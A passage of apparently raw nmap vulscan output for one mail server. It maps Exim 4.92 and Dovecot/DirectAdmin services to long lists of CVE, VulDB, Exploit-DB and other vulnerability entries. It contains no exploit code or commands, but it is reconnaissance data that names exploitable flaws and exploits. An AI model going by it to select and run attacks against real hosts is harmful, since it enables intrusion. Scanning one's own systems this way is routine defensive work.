18628| [561] Apache Web Servers mod_status /server-status Information Disclosure
18629| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
18630| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
18631| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
18632| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
18633| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
18634| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
18635| [376] Apache Tomcat contextAdmin Arbitrary File Access
18636| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
18637| [222] Apache HTTP Server test-cgi Arbitrary File Access
18638| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
18639| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
18640|_
18641445/tcp filtered microsoft-ds
18642465/tcp open ssl/smtp Exim smtpd 4.92
18643| vulscan: VulDB - https://vuldb.com:
18644| [141327] Exim up to 4.92.1 Backslash privilege escalation
18645| [138827] Exim up to 4.92 Expansion Code Execution
18646| [135932] Exim up to 4.92 privilege escalation
18647| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
18648|
18649| MITRE CVE - https://cve.mitre.org:
18650| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
18651| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
18652| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
18653| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
18654| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
18655| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
18656| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
18657| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
18658| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
18659| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
18660| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
18661| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
18662| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
18663| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
18664| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
18665| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
18666|
18667| SecurityFocus - https://www.securityfocus.com/bid/:
18668| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
18669| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
18670| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
18671| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
18672| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
18673| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
18674| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
18675| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
18676| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
18677| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
18678| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
18679| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
18680| [45308] Exim Crafted Header Remote Code Execution Vulnerability
18681| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
18682| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
18683| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
18684| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
18685| [17110] sa-exim Unauthorized File Access Vulnerability
18686| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
18687| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
18688| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
18689| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
18690| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
18691| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
18692| [6314] Exim Internet Mailer Format String Vulnerability
18693| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
18694| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
18695| [2828] Exim Format String Vulnerability
18696| [1859] Exim Buffer Overflow Vulnerability
18697|
18698| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18699| [84758] Exim sender_address parameter command execution
18700| [84015] Exim command execution
18701| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
18702| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
18703| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
18704| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
18705| [67455] Exim DKIM processing code execution
18706| [67299] Exim dkim_exim_verify_finish() format string
18707| [65028] Exim open_log privilege escalation
18708| [63967] Exim config file privilege escalation
18709| [63960] Exim header buffer overflow
18710| [59043] Exim mail directory privilege escalation
18711| [59042] Exim MBX symlink
18712| [52922] ikiwiki teximg plugin information disclosure
18713| [34265] Exim spamd buffer overflow
18714| [25286] Sa-exim greylistclean.cron file deletion
18715| [22687] RHSA-2005:025 updates for exim not installed
18716| [18901] Exim dns_build_reverse buffer overflow
18717| [18764] Exim spa_base64_to_bits function buffer overflow
18718| [18763] Exim host_aton buffer overflow
18719| [16079] Exim require_verify buffer overflow
18720| [16077] Exim header_check_syntax buffer overflow
18721| [16075] Exim sender_verify buffer overflow
18722| [13067] Exim HELO or EHLO command heap overflow
18723| [10761] Exim daemon.c format string
18724| [8194] Exim configuration file -c command-line argument buffer overflow
18725| [7738] Exim allows attacker to hide commands in localhost names using pipes
18726| [6671] Exim "
18727| [1893] Exim MTA allows local users to gain root privileges
18728|
18729| Exploit-DB - https://www.exploit-db.com:
18730| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
18731| [15725] Exim 4.63 Remote Root Exploit
18732| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
18733| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
18734| [796] Exim <= 4.42 Local Root Exploit
18735| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
18736|
18737| OpenVAS (Nessus) - http://www.openvas.org:
18738| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
18739|
18740| SecurityTracker - https://www.securitytracker.com:
18741| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
18742| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
18743| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
18744| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
18745| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
18746| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
18747| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
18748| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
18749| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
18750| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
18751| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
18752| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
18753|
18754| OSVDB - http://www.osvdb.org:
18755| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
18756| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
18757| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
18758| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
18759| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
18760| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
18761| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
18762| [70696] Exim log.c open_log() Function Local Privilege Escalation
18763| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
18764| [69685] Exim string_format Function Remote Overflow
18765| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
18766| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
18767| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
18768| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
18769| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
18770| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
18771| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
18772| [12726] Exim -be Command Line Option host_aton Function Local Overflow
18773| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
18774| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
18775| [10032] libXpm CreateXImage Function Integer Overflow
18776| [7160] Exim .forward :include: Option Privilege Escalation
18777| [6479] Vexim COOKIE Authentication Credential Disclosure
18778| [6478] Vexim Multiple Parameter SQL Injection
18779| [5930] Exim Parenthesis File Name Filter Bypass
18780| [5897] Exim header_syntax Function Remote Overflow
18781| [5896] Exim sender_verify Function Remote Overflow
18782| [5530] Exim Localhost Name Arbitrary Command Execution
18783| [5330] Exim Configuration File Variable Overflow
18784| [1855] Exim Batched SMTP Mail Header Format String
18785|_
18786587/tcp open smtp Exim smtpd 4.92
18787| vulscan: VulDB - https://vuldb.com:
18788| [141327] Exim up to 4.92.1 Backslash privilege escalation
18789| [138827] Exim up to 4.92 Expansion Code Execution
18790| [135932] Exim up to 4.92 privilege escalation
18791| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
18792|
18793| MITRE CVE - https://cve.mitre.org:
18794| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
18795| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
18796| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
18797| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
18798| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
18799| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
18800| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
18801| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
18802| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
18803| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
18804| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
18805| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
18806| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
18807| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
18808| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
18809| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
18810|
18811| SecurityFocus - https://www.securityfocus.com/bid/:
18812| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
18813| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
18814| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
18815| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
18816| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
18817| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
18818| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
18819| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
18820| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
18821| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
18822| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
18823| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
18824| [45308] Exim Crafted Header Remote Code Execution Vulnerability
18825| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
18826| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
18827| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
18828| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
18829| [17110] sa-exim Unauthorized File Access Vulnerability
18830| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
18831| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
18832| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
18833| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
18834| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
18835| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
18836| [6314] Exim Internet Mailer Format String Vulnerability
18837| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
18838| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
18839| [2828] Exim Format String Vulnerability
18840| [1859] Exim Buffer Overflow Vulnerability
18841|
18842| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18843| [84758] Exim sender_address parameter command execution
18844| [84015] Exim command execution
18845| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
18846| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
18847| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
18848| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
18849| [67455] Exim DKIM processing code execution
18850| [67299] Exim dkim_exim_verify_finish() format string
18851| [65028] Exim open_log privilege escalation
18852| [63967] Exim config file privilege escalation
18853| [63960] Exim header buffer overflow
18854| [59043] Exim mail directory privilege escalation
18855| [59042] Exim MBX symlink
18856| [52922] ikiwiki teximg plugin information disclosure
18857| [34265] Exim spamd buffer overflow
18858| [25286] Sa-exim greylistclean.cron file deletion
18859| [22687] RHSA-2005:025 updates for exim not installed
18860| [18901] Exim dns_build_reverse buffer overflow
18861| [18764] Exim spa_base64_to_bits function buffer overflow
18862| [18763] Exim host_aton buffer overflow
18863| [16079] Exim require_verify buffer overflow
18864| [16077] Exim header_check_syntax buffer overflow
18865| [16075] Exim sender_verify buffer overflow
18866| [13067] Exim HELO or EHLO command heap overflow
18867| [10761] Exim daemon.c format string
18868| [8194] Exim configuration file -c command-line argument buffer overflow
18869| [7738] Exim allows attacker to hide commands in localhost names using pipes
18870| [6671] Exim "
18871| [1893] Exim MTA allows local users to gain root privileges
18872|
18873| Exploit-DB - https://www.exploit-db.com:
18874| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
18875| [15725] Exim 4.63 Remote Root Exploit
18876| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
18877| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
18878| [796] Exim <= 4.42 Local Root Exploit
18879| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
18880|
18881| OpenVAS (Nessus) - http://www.openvas.org:
18882| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
18883|
18884| SecurityTracker - https://www.securitytracker.com:
18885| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
18886| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
18887| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
18888| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
18889| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
18890| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
18891| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
18892| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
18893| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
18894| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
18895| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
18896| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
18897|
18898| OSVDB - http://www.osvdb.org:
18899| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
18900| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
18901| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
18902| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
18903| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
18904| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
18905| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
18906| [70696] Exim log.c open_log() Function Local Privilege Escalation
18907| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
18908| [69685] Exim string_format Function Remote Overflow
18909| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
18910| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
18911| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
18912| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
18913| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
18914| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
18915| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
18916| [12726] Exim -be Command Line Option host_aton Function Local Overflow
18917| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
18918| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
18919| [10032] libXpm CreateXImage Function Integer Overflow
18920| [7160] Exim .forward :include: Option Privilege Escalation
18921| [6479] Vexim COOKIE Authentication Credential Disclosure
18922| [6478] Vexim Multiple Parameter SQL Injection
18923| [5930] Exim Parenthesis File Name Filter Bypass
18924| [5897] Exim header_syntax Function Remote Overflow
18925| [5896] Exim sender_verify Function Remote Overflow
18926| [5530] Exim Localhost Name Arbitrary Command Execution
18927| [5330] Exim Configuration File Variable Overflow
18928| [1855] Exim Batched SMTP Mail Header Format String
18929|_
18930666/tcp filtered doom
18931993/tcp open ssl/imap
18932| fingerprint-strings:
18933| NULL:
18934|_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
18935995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d
18936| vulscan: VulDB - https://vuldb.com:
18937| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
18938| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
18939| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
18940| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
18941| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
18942| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
18943| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
18944| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
18945| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
18946| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
18947| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
18948| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
18949| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
18950| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
18951| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
18952| [95100] DirectAdmin up to 1.50.1 Crash denial of service
18953| [69835] Dovecot 2.2.0/2.2.1 denial of service
18954| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
18955| [65684] Dovecot up to 2.2.6 unknown vulnerability
18956| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
18957| [63692] Dovecot up to 2.0.15 spoofing
18958| [7062] Dovecot 2.1.10 mail-search.c denial of service
18959| [62578] DirectAdmin 1.403 cross site scripting
18960| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
18961| [57517] Dovecot up to 2.0.12 Login directory traversal
18962| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
18963| [57515] Dovecot up to 2.0.12 Crash denial of service
18964| [54944] Dovecot up to 1.2.14 denial of service
18965| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
18966| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
18967| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
18968| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
18969| [53277] Dovecot up to 1.2.10 denial of service
18970| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
18971| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
18972| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
18973| [45256] Dovecot up to 1.1.5 directory traversal
18974| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
18975| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
18976| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
18977| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
18978| [40356] Dovecot 1.0.9 Cache unknown vulnerability
18979| [38747] DirectAdmin 1.30.2 cross site scripting
18980| [38222] Dovecot 1.0.2 directory traversal
18981| [37578] DirectAdmin 1.30.1 cross site scripting
18982| [36376] Dovecot up to 1.0.x directory traversal
18983| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
18984| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
18985| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
18986| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
18987|
18988| MITRE CVE - https://cve.mitre.org:
18989| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
18990| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
18991| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
18992| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
18993| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
18994| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
18995| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
18996| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
18997| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
